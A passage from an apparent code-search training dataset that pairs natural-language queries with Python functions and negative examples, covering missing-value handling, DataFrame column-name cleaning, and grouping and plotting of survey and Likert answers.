"def deleteNoneWantedData(tX, percentFactor) :\n columnToSuppress = []\n columnTreshold = len(tX) * percentFactor\n\n for column in range(len(tX[0])) :\n columnCounter = 0\n for row in range(len(tX)) :\n if tX[row][column] == -999.0 :\n columnCounter += 1\n if columnCounter > columnTreshold :\n columnToSuppress.append(column)\n break\n\n newTX = []\n for row in tX :\n newRow = np.delete(row, columnToSuppress)\n newTX.append(newRow)\n\n\t\n return np.array(newTX)",
"def x_are_none():\n list_x = []\n for k in Term.values.keys():\n if Term.values[k] is None:\n list_x.append(k)\n return list_x",
"def test_nones(self):\n none_indexes = [1, 5, 8]\n\n # Try Nones in y_data first\n x_data, y_data = self.gen_data()\n expected_len = len(y_data) - len(none_indexes)\n values_to_be_cut = [x_data[i] for i in none_indexes]\n for i in none_indexes:\n y_data[i] = None\n line = functions.FittedLine(x_data, y_data)\n self.assertTrue(len(line.x_data) == expected_len)\n self.assertTrue(len(line.y_data) == expected_len)\n for data in values_to_be_cut:\n self.assertTrue(data not in line.x_data)\n self.assertTrue(None not in line.y_data)\n\n # Try Nones in x_data next\n x_data, y_data = self.gen_data()\n expected_len = len(y_data) - len(none_indexes)\n values_to_be_cut = [y_data[i] for i in none_indexes]\n for i in none_indexes:\n x_data[i] = None\n line = functions.FittedLine(x_data, y_data)\n self.assertTrue(len(line.x_data) == expected_len)\n self.assertTrue(len(line.y_data) == expected_len)\n for data in values_to_be_cut:\n self.assertTrue(data not in line.y_data)\n self.assertTrue(None not in line.x_data)\n\n # Try Nones in both\n x_data, y_data = self.gen_data()\n x_none_indexes = [1, 2]\n y_none_indexes = [3, 4]\n none_indexes = set(x_none_indexes).union(y_none_indexes)\n expected_len = len(x_data) - len(none_indexes)\n x_cut_values = []\n for i in x_none_indexes:\n x_cut_values.append(x_data[i])\n x_data[i] = None\n y_cut_values = []\n for i in y_none_indexes:\n y_cut_values.append(y_data[i])\n y_data[i] = None\n line = functions.FittedLine(x_data, y_data)\n self.assertTrue(len(line.x_data) == expected_len)\n self.assertTrue(None not in line.x_data)\n self.assertTrue(len(line.y_data) == expected_len)\n self.assertTrue(None not in line.y_data)\n for v in x_cut_values:\n self.assertTrue(v not in line.x_data)\n for v in y_cut_values:\n self.assertTrue(v not in line.y_data)",
"def test_dropna_samples(self, feature_values, feature_data):\n\n sample_data = pd.DataFrame(\n {\n 'phenotype': ['sensitive', None, None, 'resistant']\n },\n index=['s1', 's2', 's3', 's4'])\n\n matrix = AnnotatedMatrix(\n feature_values, sample_data=sample_data, feature_data=feature_data)\n\n matrix = matrix.dropna_samples()\n\n assert list(matrix.columns) == ['s1', 's4']\n assert list(matrix.sample_data.index) == ['s1', 's4']",
"def notna(self) -> npt.NDArray[np.bool_]:\n return ~self.isna()",
"def nullify_empty_answers(self, data, many):\n def nullify_if_necessary(data):\n if not data['answers']:\n data['answers'] = None\n\n if not many:\n nullify_if_necessary(data)\n else:\n map(nullify_if_necessary, data)\n return data",
"def removeIncompleteData(self):\n\n for _key in self.data.keys():\n self.data[_key] = self.data[_key].replace(0, np.NaN)\n self.data[_key] = self.data[_key].dropna(subset=['NW_M', 'NW_X', 'TV_M', 'TV_X', 'UV_M', 'UV_X'])",
"def nan(self, x):\n return math.isnan(x)",
"def test_NaN_in_x():\n\n # Generate a low-pass filtered signal with NaNs\n x = np.random.randn(10000)\n Fs = 1000\n x = neurodsp.filter(x, Fs, 'lowpass', f_lo=50)\n\n # Compute phase, amp, and freq time series\n f_range = (4, 8)\n pha = neurodsp.phase_by_time(x, Fs, f_range)\n amp = neurodsp.amp_by_time(x, Fs, f_range)\n i_f = neurodsp.freq_by_time(x, Fs, f_range)\n\n assert len(pha[~np.isnan(pha)]) > 0\n assert len(amp[~np.isnan(amp)]) > 0\n assert len(i_f[~np.isnan(i_f)]) > 0",
"def isnan(quat):\n if math.isnan(quat.s) or math.isnan(quat.v[0,0]) or math.isnan(quat.v[0,1]) or math.isnan(quat.v[0,2]):\n return True\n else:\n return False",
"def discard_invalid_trials(dat):\n\n if 'time_invalid' in dat.columns:\n mask = ((dat['eye_invalid'] != 1) | (_np.isnan(dat['eye_invalid'])) &\n (dat['time_invalid'] != 1))\n else:\n mask = (dat['eye_invalid'] != 1) | (_np.isnan(dat['eye_invalid']))\n\n dat = dat.loc[mask, :]\n return(dat)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Various cleaning white spaces in columns name Can extend that function if some other form of errors are found later
|
def cleaning_columns_white_space(self, df):
return df.rename(columns=lambda x: self.cleaning_some_white_space(x))
|
[
"def tidy_data(df):\n\n ##clean up column headings\n df.columns = df.columns.str.strip().str.lower().str.replace(' ', '_').str.replace('(', '').str.replace(')', '')",
"def clean_cols(data):\n clean_col_map = {x: x.lower().strip() for x in list(data)}\n return data.rename(index=str, columns=clean_col_map)",
"def clean_column_name(name: str) -> str:\n essential_chars = set(string.ascii_letters + string.digits + \"_\")\n name_no_spaces = \"_\".join(name.split())\n\n return \"\".join(filter(lambda char: char in set(essential_chars), name_no_spaces))",
"def preprocess_df_headers(dataframe: pd.DataFrame):\n dataframe.columns = dataframe.columns.str.strip()\n dataframe.columns = dataframe.columns.str.replace(\" \", \"_\")\n dataframe.columns = dataframe.columns.str.replace(\"#\", \"NUM\")\n dataframe.columns = dataframe.columns.str.replace(\"/\", \"_\")\n dataframe.replace('', np.nan, inplace=True)",
"def clean_column_names(df):\r\n columns = df.columns\r\n colupdated = []\r\n for col in columns:\r\n removespecialchars = col.translate({ord(c): \"\" for c in \"!@#$%^&*()[]{};:,. /<>?\\|`~-=_+'\"})\r\n colupdated.append(removespecialchars)\r\n df.columns = colupdated\r\n return df",
"def _clean_column_names(self):\n self.logger.info(\"Set up column name cleaning.\")\n self.pipeline.steps.append(\n (\"clean_column_names\", TransformerWrapper(CleanColumnNames()))\n )",
"def __clean_prefix(df, col, taboo_word): # @vaihauWILIAMU\n df = __drop_redundancy(df, col, taboo_word) \n return df",
"def _validate_column_names(df):\n to_rename = {}\n for column in df:\n if '.' in column:\n to_rename[column] = column.replace('.', '')\n return df.rename(columns=to_rename)",
"def _standardize_column_values(dataframe):\n\n # TODO Use None instead of \"-\"; but may affect downstream pipelines that use \"-\" already\n if \"structure.alternate_model\" in dataframe.columns:\n dataframe[\"structure.alternate_model\"].replace(\"\", \"-\", inplace=True)\n if \"ligand.expo_id\" in dataframe.columns:\n dataframe[\"ligand.expo_id\"].replace(0, \"-\", inplace=True)\n if \"ligand_allosteric.expo_id\" in dataframe.columns:\n dataframe[\"ligand_allosteric.expo_id\"].replace(0, \"-\", inplace=True)\n if \"structure.resolution\" in dataframe.columns:\n dataframe[\"structure.resolution\"].replace(0, np.nan, inplace=True)\n\n # In case of drugs\n if \"drug.brand_name\" in dataframe.columns:\n dataframe[\"drug.brand_name\"] = dataframe[\"drug.brand_name\"].apply(\n lambda x: x.split(\";\") if x != \"\" else []\n )\n if \"drug.synonyms\" in dataframe.columns:\n dataframe[\"drug.synonyms\"] = dataframe[\"drug.synonyms\"].apply(\n lambda x: x.split(\"\\t\") if x != \"\" else []\n )\n\n return dataframe",
"def format_column_name(c):\n return c.replace(\"-\", \"_\").replace(\"(\", \"\").replace(\")\", \"\")\\\n .replace(\" \", \"_\").lower()",
"def clean_entries(entry):\n \n # convert None and NaN to an empty string. This allows simple string concatenation\n if pd.isnull(entry):\n entry = ''\n \n # convert to string, lowercase, and strip leading and trailing whitespace\n entry = str(entry).lower().strip()\n \n # cut down (internal) consecutive whitespaces to one white space\n entry = re.sub(r'\\s+', ' ', entry)\n \n return entry",
"def normalize_column_names(df: DataFrame) -> DataFrame:\n list_new_names = []\n for col in df.columns:\n new_name = col.strip()\n new_name = new_name.replace(\" \", \"\")\n new_name = new_name.replace(\".\", \"_\")\n new_name = new_name.lower()\n list_new_names.append(new_name)\n df = df.toDF(*list_new_names)\n return df",
"def stripCols(self):\n for frame in self.files.values():\n for col in frame.columns:\n frame[col] = frame[col].str.strip()",
"def trim_all_columns(df):\r\n trim_strings = lambda x: x.strip() if isinstance(x, str) else x\r\n return df.applymap(trim_strings)",
"def _pre_wrap_with_ascii_replace(self, colname, datatype):\n pass",
"def clean_text(df):\n\n df.replace(r\"\\*\", \"\", regex=True, inplace=True)\n df.replace(r\"\\n\", ' ', regex=True, inplace=True)\n df.replace(r\"\\r\", ' ', regex=True, inplace=True)\n\n # clean_string = trim_whitespace(df)\n # clean_string = lambda x: re.sub(r\"\\[1\\]\", \"\", x).strip() if isinstance(x, str) else x\n return df.applymap(trim_whitespace)",
"def trim_columns(df):\r\n trim_strings = lambda x: x[:-4] if isinstance(x, str) else x\r\n return df.applymap(trim_strings)",
"def parse_col_name(col_name):\n return col_name.upper().strip()",
"def _simplify_features(df):\n simple = [col for col in df.columns if 'error' not in col]\n simple_df = df[simple]\n simple_df.columns = [col.replace(' ', '_') for col in simple]\n \n return simple_df"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
The questions YN and the likert questions can be grouped together to have one plot for each. The likert questions need to be checked on their answer_format for not mixing different type of likert scale
|
def grouping_likert_yn(group_question):
group_survey_q, group_original_question = list(), list()
previous_answer_format = None
previous_file_answer = None
previous_order_question = None
file_answer = None
for q in group_question:
current_answer_format = group_question[q]['answer_format'].lower()
survey_q = group_question[q]['survey_q']
original_q = group_question[q]['original_question']
file_answer = group_question[q]['file_answer']
order_question = group_question[q]['order_question']
if order_question == 'TRUE':
order_question = True
else:
order_question = False
if previous_answer_format in ['y/n/na', 'likert'] or current_answer_format in ['y/n/na', 'likert']:
if current_answer_format == previous_answer_format or previous_answer_format is None:
if previous_answer_format == 'likert' and current_answer_format == 'likert':
if previous_file_answer != file_answer:
yield group_survey_q, group_original_question, previous_answer_format, previous_file_answer, previous_order_question
group_survey_q, group_original_question = list(), list()
group_survey_q.extend(survey_q)
group_original_question.append(original_q)
else:
yield group_survey_q, group_original_question, previous_answer_format, previous_file_answer, previous_order_question
group_survey_q, group_original_question = list(), list()
group_survey_q.extend(survey_q)
group_original_question.append(original_q)
else:
if len(group_survey_q) > 0:
yield group_survey_q, group_original_question, previous_answer_format, previous_file_answer, previous_order_question
group_survey_q, group_original_question = list(), list()
group_survey_q.extend(survey_q)
group_original_question.append(original_q)
previous_answer_format = current_answer_format
previous_file_answer = file_answer
previous_order_question = order_question
yield group_survey_q, group_original_question, previous_answer_format, file_answer, previous_order_question
|
[
"def scores_vs_rating():\n\n rating_comparison = {\n 1: [], 2: [], 3: [], 4: [], 5: []\n }\n\n rating_key = \"like_rating_specific\"\n\n for user, session in Session.get_users_with_surveys():\n\n boundary = HistogramBoundary(user)\n\n survey = user.get_survey()\n\n for playlist_index, playlist in enumerate(session.recommendations):\n survey_ratings = survey[f\"playlist{playlist_index+1}\"][rating_key]\n\n for track_index, track in enumerate(playlist[\"tracks\"]):\n\n track_rating, _ = boundary.get_boundary_score(track)\n\n survey_rating = int(survey_ratings[f'Song{track_index + 1}'])\n\n rating_comparison[survey_rating].append(track_rating)\n\n result_string = \"\"\n\n for rating_bin, scores in rating_comparison.items():\n result_string += f\"{rating_bin}: {statistics.mean(scores):.3f}, \"\n result_string = result_string[:-2]\n print(result_string)\n\n for rating_bin, scores in rating_comparison.items():\n\n plt.hist(scores, bins=20)\n plt.title(f\"Rating: {rating_bin} (total: {len(scores)})\")\n plt.xlim((0.0, 8.0))\n plt.show()\n\n t_tests = {}\n for i in range(1, 6):\n t_tests[i] = {}\n for j in range(1, 6):\n if i != j:\n\n t_test_score = ttest_ind(\n rating_comparison[i], # [:min_amount],\n rating_comparison[j], # [:min_amount],\n equal_var=False\n )\n t_tests[i][j] = t_test_score[1]\n\n pprint(t_tests)",
"def make_comparison_klg_yhat_plot(yhat, y, klg):\n check_is_array(yhat)\n check_is_array(y)\n check_is_array(klg)\n \n discretized_yhat = discretize_yhat_like_kl_grade(yhat_arr=yhat,\n kl_grade_arr=klg,\n y_col='koos_pain_subscore')\n discretized_vals = range(5)\n \n assert set(klg) == set(discretized_vals)\n assert y.max() == 100\n assert set(discretized_yhat) == set(discretized_vals)\n print('pearson correlation between our original score and y %2.3f' % pearsonr(yhat, y)[0]) \n print('pearson correlation between our discretized score and y %2.3f' % pearsonr(discretized_yhat, y)[0]) \n print('pearson correlation between klg and y %2.3f' % pearsonr(klg, y)[0])\n\n # box plot. \n plt.figure(figsize=[8, 4])\n ylimits = [0, 102]\n plt.subplot(121)\n sns.boxplot(x=discretized_yhat, y=y)\n plt.xlabel(\"Discretized $\\hat y$\")\n plt.ylabel('Koos pain score')\n plt.ylim(ylimits)\n plt.subplot(122)\n sns.boxplot(x=klg, y=y)\n plt.yticks([])\n plt.xlabel(\"KLG\")\n plt.ylim(ylimits)\n plt.savefig('sendhil_plots/klg_yhat_comparison_boxplot.png', dpi=300)\n plt.show()\n \n # plot median value of y by each KLG/yhat bin. \n klg_y_medians = []\n yhat_y_medians = []\n for val in discretized_vals:\n yhat_idxs = discretized_yhat == val\n klg_idxs = klg == val\n print(\"score %i: yhat and KLG means: %2.3f %2.3f; yhat and KLG medians %2.3f %2.3f\" % \n (val, y[yhat_idxs].mean(), y[klg_idxs].mean(), np.median(y[yhat_idxs]), np.median(y[klg_idxs])))\n klg_y_medians.append(np.median(y[klg_idxs]))\n yhat_y_medians.append(np.median(y[yhat_idxs]))\n plt.figure(figsize=[5, 4])\n plt.plot(discretized_vals, yhat_y_medians, label='Our model', color='green')\n plt.plot(discretized_vals, klg_y_medians, label='KLG', color='red')\n plt.legend()\n plt.xticks(discretized_vals)\n plt.ylabel(\"Median Koos pain score\")\n plt.xlabel(\"Severity grade\")\n #plt.savefig('sendhil_plots/klg_yhat_comparison_line_plot.png', dpi=300)\n plt.show()",
"def visualize(answer_data, request_options):\n answers = answer_data['answers']\n return _visualize(answers, request_options, search_mode=bool(answer_data['keyword']))",
"def single_season_sentiment_figure():\n episodes = load_episodes()\n pos_neg_ratios = []\n\n # get the ratios\n for episode in sorted(episodes[1].keys()):\n sentiments = get_episode_sentiment(episodes[1][episode])\n pos_neg_ratios.append(100 * sentiments[0]/ float(sentiments[0] + sentiments[2]))\n\n # plot the figure\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(range(1, len(episodes[1]) + 1), pos_neg_ratios)\n ax.plot(range(1, len(episodes[1]) + 1), pos_neg_ratios)\n ax.set_xticks(range(1, len(episodes[1])+1))\n ax.set_xlim(0, len(episodes[1]) + 1)\n ax.set_ylim(0,100)\n ax.set_xlabel(\"Episode #\")\n ax.set_ylabel(\"Pos/Neg Sentiment Ratio\")\n ax.set_title(\"Pos/Neg Sentiment Ratios for Season 1 Episodes of 'The West Wing'\")\n plt.tight_layout()\n plt.savefig(\"figures/season_1_posneg_ratios.png\")",
"def sample_answers(y, product_set, p_idk = 0.1, p_2a = 0.3, p_3a = 0.15):\n # Get set of possible questions available in the product catalog\n question_set = set(product_set[\"PropertyDefinitionId\"].values) # faster\n \n # Get dict of (true) answers available for the target product\n quest_answer_y = algo_utils.get_answers_y(y, product_set) \n result = {}\n \n # For each question sample additional answers \n # or replace true answer by idk if necessary.\n for question in question_set:\n # Sample random number b/w 0 and 1.\n u = random.random()\n # Sample if user says idk\n if u < p_idk:\n result[question] = ['idk'] \n # Else if it is possible sample if user give additional answers.\n elif quest_answer_y[question]=='none': #if none you can't have a 2nd answer\n result[question] = [quest_answer_y[question]]\n elif quest_answer_y[question]=='idk': #if none you can't have a 2nd answer\n result[question] = [quest_answer_y[question]] \n # Giving 2 answers?\n elif u < p_idk+p_2a:\n possible = get_all_answers(question, product_set)\n sample = np.random.choice(possible, size=1)\n # If the drawn 2nd answer is the same, redraw one\n while (str(quest_answer_y[question]) in sample.astype(str)): \n sample = np.random.choice(possible, size=1)\n result[question] = np.append([quest_answer_y[question]], sample) \n # Giving 3 answers?\n elif u < p_idk+p_2a+p_3a:\n possible = get_all_answers(question, product_set)\n sample = np.random.choice(possible, size=2, replace=False)\n # If the drawn 2nd or 3rd answer is the same, redraw 2 answers\n while (str(quest_answer_y[question]) in sample.astype(str)):\n sample = np.random.choice(possible, size=2)\n result[question] = np.append([quest_answer_y[question]], sample)\n # Else keep only the true answer \n else:\n result[question] = [quest_answer_y[question]] \n return(result)",
"def tally_answers(results, fieldnames):\n question_tallies = dict().fromkeys(fieldnames)\n for question in question_tallies:\n question_tallies[question] = dict()\n for row in results:\n for question in row:\n if row[question].strip() and row[question].strip() != \"N/A\":\n if row[question].strip() not in question_tallies[question]:\n question_tallies[question][row[question].strip()] = 1\n else:\n question_tallies[question][row[question].strip()] += 1\n return question_tallies",
"def generate_likert_table(labels, questions, form_name=None, help_texts=None, widget=None, use_likert_scale=True,\n make_label_tag=False, **kwargs):\n if not help_texts:\n help_texts = [''] * len(questions)\n\n if not widget:\n widget = widgets.RadioSelect\n\n if len(help_texts) != len(questions):\n raise ValueError('Number of questions must be equal to number of help texts.')\n\n if use_likert_scale:\n field_generator = generate_likert_field(labels, widget=widget)\n header_labels = labels\n else:\n field_generator = partial(models.StringField, choices=labels, widget=widget or widgets.RadioSelectHorizontal)\n header_labels = [t[1] for t in labels]\n\n fields = []\n for (field_name, field_label), help_text in zip(questions, help_texts):\n fields.append((field_name, {\n 'help_text': help_text,\n 'label': field_label,\n 'make_label_tag': make_label_tag,\n 'field': field_generator(),\n }))\n\n form_def = {'form_name': form_name, 'fields': fields, 'render_type': 'table', 'header_labels': header_labels}\n form_def.update(dict(**kwargs))\n\n return form_def",
"def compare_span_to_answer(self,spans,answers,question,question_annotated=None):\n if len(spans)==0:\n return []\n\n\n found_answers = pd.DataFrame(columns=['span','answer','span_index'])\n spans_series = pd.Series(spans)\n pre_proc_answers = []\n answers = [answer.lower().strip() for answer in answers]\n for answer in answers:\n proc_answer = unicodedata.normalize('NFKD', answer).encode('ascii', 'ignore').decode(encoding='UTF-8')\n\n # removing common endings such as \"f.c.\"\n proc_answer = re.sub(r'\\W',' ',proc_answer).lower().strip()\n # removing The, a, an from begining of answer as proposed by SQuAD dataset answer comparison\n if proc_answer.startswith('the '):\n proc_answer = proc_answer[4:]\n if proc_answer.startswith('a '):\n proc_answer = proc_answer[2:]\n if proc_answer.startswith('an '):\n proc_answer = proc_answer[3:]\n\n\n\n pre_proc_answers.append(proc_answer)\n\n\n\n question = question.lower().strip()\n\n # processing question:\n #question_annotated = pd.DataFrame(question_annotated)\n\n # exact match:\n for pre_proc_answer,answer in zip(pre_proc_answers,answers):\n\n if answer in spans:\n exact_match_ind = spans.index(answer)\n found_answers = found_answers.append({'span_index':exact_match_ind,'answer':answer,'span':answer},ignore_index=True)\n\n if pre_proc_answer in spans:\n exact_match_ind = spans.index(pre_proc_answer)\n found_answers = found_answers.append({'span_index': exact_match_ind, 'answer': answer, 'span': pre_proc_answer},ignore_index=True)\n\n # year should match year.\n if question.find('year')>-1:\n year_in_answer = re.search('([1-2][0-9]{3})', answer)\n if year_in_answer is not None:\n year_in_answer = year_in_answer.group(0)\n\n year_spans = spans_series[spans_series == year_in_answer]\n if len(year_spans)>0:\n found_answers = found_answers.append(\n {'span_index': year_spans.index[0], 'answer': answer, 'span': year_in_answer}, ignore_index=True)\n\n\n return found_answers.drop_duplicates()",
"def usage_plot(cohorts):\n\tkmf = lifelines.KaplanMeierFitter()\n\tnorm_column = ['Anxiety', 'Mood', 'Psychosis', 'Sleep', 'Social', 'Medication']\n\tfor cohort in cohorts:\n\t\ttime_vals = []\n\t\test_vals = []\n\t\tfor day_group in cohort.groupby(cohort.index):\n\t\t\t#print(day_group[1][norm_column])\n\t\t\tfor col in norm_column:\n\t\t\t\ttime_vals += day_group[1][day_group[1][col].notnull()][col].index.tolist()\n\t\t\t\test_vals += len(day_group[1][day_group[1][col].notnull()][col].index) * [1]\n\n\t\tkmf.fit(time_vals, est_vals)\n\t\tif 'ax' not in locals(): \n\t\t\tax = kmf.plot() \n\t\telse: ax = kmf.plot(ax=ax)\n\n\tplt.xlabel('Day')\n\tplt.ylabel('Percentage of surveys remaining')\n\t#plt.show()\n\tplt.savefig('test_kmf.png')",
"def plot_responses_by_exp_groups(arr_df, antigen_inds, exp_groups, fig_path=None, fig_prefix=None, fig_size=(18,11), y_lims=[0, 60000]): \n num_groups = len(exp_groups)\n f, axarr = plt.subplots(num_groups,1)\n f.set_size_inches(fig_size)\n\n # plot groups\n if len(exp_groups) == 1:\n i=0\n axarr.plot(np.arange(len(antigen_inds)), arr_df[antigen_inds].iloc[np.where(arr_df['group'] == exp_groups[i])].T)\n axarr.set_title(fig_prefix + \" \" + exp_groups[i] + \" (n = \" + str(len(np.where(arr_df['group'] == exp_groups[i])[0])) + \")\")\n axarr.set_yticks([])\n axarr.set_ylim(y_lims)\n else:\n for i in np.arange(num_groups):\n\n axarr[i].plot(np.arange(len(antigen_inds)), arr_df[antigen_inds].iloc[np.where(arr_df['group'] == exp_groups[i])].T)\n axarr[i].set_title(fig_prefix + \" \" + exp_groups[i] + \" (n = \" + str(len(np.where(arr_df['group'] == exp_groups[i])[0])) + \")\")\n axarr[i].set_yticks([])\n axarr[i].set_ylim(y_lims)\n\n # save to file only if save_flag is on\n if fig_path is not None:\n f.set_tight_layout(True)\n filename = \"\".join([fig_path, fig_prefix, \"_raw_responses_by_groups.png\"])\n f.savefig(filename, dpi=200)",
"def answersummary(self, question, candidates_sentences,\n n=3, qindex=None):\n return self.answersummaries((question, candidates_sentences, n))",
"def averagesclass():\n\tlistofresults=[]\n\tfor i in range(0,user_number):\n\t\tcurrent=list(map(function, data[i][\"responses\"]))\n\t\ta=len(current)\n\t\tfor i in range(0,numquestions-a):\n\t\t\tcurrent.append(0)\n\n\t\tlistofresults.append(current)\n\n\tresults= map(sum, zip(*listofresults))\n\tx_values=[]\n\tfor i in range(1,numquestions+1):\n\t\tx_values.append(i)\n\n\tplt.scatter(x_values, results)\n\tplt.plot(x_values, results)\n\n\tplt.ylim(0,user_number)\n\tplt.xlim(0.5,numquestions+0.5)\n\n\tplt.xticks(list(range(1,numquestions+1)))\n\tplt.xlabel(\"Question Number\")\n\tplt.ylabel(\"Number of Students who got the question Correct\")\n\n\tplt.savefig(\"analytics/class_average.png\")\n\tplt.close()",
"def all_seasons_sentiment_figure():\n episodes = load_episodes()\n # plot pos/neg ratio over the course of all seasons\n season_sentiments = []\n\n # get the ratios\n for i in range(5):\n season_sentiments.append(100* get_season_sentiment(episodes[i+1]))\n\n # plot the figure\n width = 0.35\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.bar(np.arange(0,5,1), season_sentiments, width)\n ax.set_ylim(60, 90)\n ax.set_xticks(np.arange(0,5,1) + width /2.)\n ax.set_xticklabels(np.arange(1,6,1))\n ax.set_xlabel(\"Season #\")\n ax.set_ylabel(\"Pos/Neg Sentiment Ratio\")\n ax.set_title(\"Pos/Neg Sentiment Ratios for First Five Seasons of 'The West Wing'\")\n plt.tight_layout()\n plt.savefig(\"figures/all_seasons_posneg_ratios.png\")",
"def format_question(question):\n correct = '' # check if this is the right way to handle a potential exception.\n answers = question[\"answers\"]\n random.shuffle(answers)\n human_formatted = f'{question[\"q\"]}\\n'\n machine_formatted = f'MC\\t{question[\"q\"]}\\t'\n for i, answer in enumerate(answers):\n machine_formatted += f'{answer[0]} {answer[1]}\\t'\n human_formatted += f' {string.ascii_lowercase[i]}. {answer[0]}\\n'\n if answer[1] == \"correct\":\n correct = string.ascii_lowercase[i]\n return machine_formatted, human_formatted, correct",
"def plot_graph_with_time_and_sentiment_dictionary(time_to_sentiment_dictionary):\n plot_hours = []\n plot_scores = []\n list_of_number_of_tweets_for_the_hour = []\n\n # there are 10 type of sentiment sccore for each tweet\n for k in range(10):\n plot_scores.append([])\n\n for dkey, dvalue in time_to_sentiment_dictionary.items():\n plot_hours.append(dkey)\n list_of_number_of_tweets_for_the_hour.append(dvalue[len(dvalue) - 1])\n index = 0\n for dsentiment_value in dvalue[:-1]:\n plot_scores[index].append(dsentiment_value)\n index += 1\n\n # plot graph of total sentiment score against time\n graph_one = plt.figure(1)\n for k in range(10):\n plt.plot(plot_hours, plot_scores[k])\n plt.title(\"Total Tweets' sentiment scores over time\")\n plt.xlabel('Hours elapsed since first Tweet')\n plt.ylabel('Sentiment score')\n plt.legend(['anger', 'anticipation', 'disgust', 'fear', 'joy', 'negative', 'positive', 'sadness', 'surprise',\n 'trust'], loc = 'upper left', prop={'size': 6})\n\n plt.show()\n\n # plot graph of average sentiment score per tweet against time\n graph_two = plt.figure(2)\n average_sentiment_score_per_tweet = []\n\n avg_index = -1\n for summed_score in plot_scores:\n average_sentiment_score_per_tweet.append([])\n avg_index += 1\n for k in summed_score:\n average_sentiment_score_per_tweet[avg_index].append(k/list_of_number_of_tweets_for_the_hour[avg_index])\n\n for k in range(10):\n plt.plot(plot_hours, average_sentiment_score_per_tweet[k])\n plt.title(\"Average Tweet sentiment scores over time\")\n plt.xlabel('Hours elapsed since first Tweet')\n plt.ylabel('Sentiment score')\n plt.legend(['anger', 'anticipation', 'disgust', 'fear', 'joy', 'negative', 'positive', 'sadness', 'surprise',\n 'trust'], loc = 'upper left', prop={'size': 6})\n\n plt.show()\n\n return",
"def get_question_type(input_q):\n\n # Define keywords\n duration_keywords = ['long', 'duration', 'minutes', 'time', 'length']\n time_keywords = ['century', 'year', 'when', 'month']\n location_keywords = ['country', 'location', 'where', 'coordinates']\n\n # Extract sentence structure\n parse = nlp(input_q)\n lemmas = []\n pos = []\n dep = []\n for word in parse:\n lemmas.append(word.lemma_)\n pos.append(word.pos_)\n dep.append(word.dep_)\n\n sent = parse.text.replace(\"?\", \"\") # Strip question mark\n sent = sent.replace('\"', \"\") # Strip double apostrophe\n sent = sent.replace(\"'\", \"\") # Strip single apostrophe\n\n question_type = \"\"\n if lemmas[0] == \"do\":\n question_type = \"yes/no\"\n else:\n for rel in dep:\n if 'pass' in rel:\n if parse[0].text.lower() == 'by':\n question_type = \"XofY\"\n else:\n question_type = \"passive\" # e.g. 'Which movies are directed by X?'\n break\n else:\n if 'pobj' in rel:\n question_type = \"XofY\" # e.g. 'Who is the director of X?'\n if 'dobj' in rel:\n question_type = \"verb_prop\" # e.g. 'Who directed X?'\n if any(item in duration_keywords for item in lemmas):\n question_type = \"duration\" # e.g. 'How long is X?'\n elif any(item in location_keywords for item in lemmas):\n question_type = \"location\" # e.g. 'Where was X filmed?'\n elif any(item in time_keywords for item in lemmas):\n question_type = \"time\" # e.g. 'When was X published?'\n elif parse[0].text == \"What\" or parse[0].text == \"Which\":\n if parse[1].pos_ == \"NOUN\":\n if \"AUX\" in pos and lemmas[pos.index(\"AUX\")] == \"be\":\n question_type = \"what_A_is_X_Y\" # e.g 'What book is X based on?'\n elif \"AUX\" in pos and lemmas[pos.index(\"VERB\")] == \"earn\":\n question_type = \"what_A_is_X_Y\" # e.g. 'Which movies earned X an award?'\n else:\n question_type = \"what_which_verb\" # e.g. 'What awards did X receive?'\n elif 'about' in lemmas:\n question_type = \"about\"\n else:\n question_type = \"what_is_Xs_Y\" # e.g. 'What is X's hair color?'\n elif \"tall\" in lemmas:\n question_type = \"tall\" # e.g 'How tall is X?'\n elif \"cost\" in lemmas:\n question_type = \"cost\" # e.g. 'How much did X cost to make?'\n elif (\"many\" in lemmas or \"much\" in lemmas) and \"follower\" not in lemmas:\n question_type = \"count\" # e.g. 'How many X films are there?'\n\n return question_type",
"def score_answers(\n self, prompt: Dict[str, np.ndarray], answers: List[Dict[str, np.ndarray]]\n ) -> np.ndarray:",
"def get_metrics_with_answer_stats(long_answer_stats, short_answer_stats):\n\n long_no_answer_wrong = []\n long_has_answer_wrong = []\n long_span_wrong = []\n short_no_answer_wrong = []\n short_has_answer_wrong = []\n short_span_wrong = []\n\n def _get_metric_dict(answer_stats, prefix=''):\n \"\"\"Compute all metrics for a set of answer statistics.\"\"\"\n tp = fp = fn = 0.\n for has_gold, has_pred, is_correct, _, example_id in answer_stats:\n # !!!!!!!!!!!!!\n # is_correct is False as long as gold is null span\n if has_gold and is_correct:\n # TP = the predicted indices match one of the possible ground truth indices\n tp += 1\n elif has_pred and not is_correct:\n # FP = the predicted indices do NOT match one of the possible ground truth indices,\n # OR a prediction has been made where no ground truth exists\n fp += 1\n if not has_gold and prefix == 'long-':\n long_no_answer_wrong.append(example_id)\n if not has_gold and prefix == 'short-':\n short_no_answer_wrong.append(example_id)\n if has_gold and prefix == 'long-':\n long_span_wrong.append(example_id)\n if has_gold and prefix == 'short-':\n short_span_wrong.append(example_id)\n elif not has_pred and has_gold:\n # FN = no prediction has been made where a ground truth exists\n fn += 1\n if prefix == 'long-':\n long_has_answer_wrong.append(example_id)\n if prefix == 'short-':\n short_has_answer_wrong.append(example_id)\n\n f1 = safe_divide(2 * tp, 2 * tp + fp + fn)\n precision = safe_divide(tp, tp + fp)\n recall = safe_divide(tp, tp + fn)\n\n metrics = OrderedDict({\n 'f1': f1,\n 'precision': precision,\n 'recall': recall,\n })\n\n # Add prefix before returning.\n return dict([(prefix + k, v) for k, v in six.iteritems(metrics)])\n\n metrics = _get_metric_dict(long_answer_stats, 'long-')\n metrics.update(_get_metric_dict(short_answer_stats, 'short-'))\n metrics.update(_get_metric_dict(long_answer_stats + short_answer_stats, 'all-'))\n\n with open('wrong_examples.json', 'w') as w:\n json.dump({\n 'long_no_answer_wrong': long_no_answer_wrong,\n 'long_has_answer_wrong': long_has_answer_wrong,\n 'long_span_wrong': long_span_wrong,\n 'short_no_answer_wrong': short_no_answer_wrong,\n 'short_has_answer_wrong': short_has_answer_wrong,\n 'short_span_wrong': short_span_wrong\n }, w, indent=2)\n return metrics",
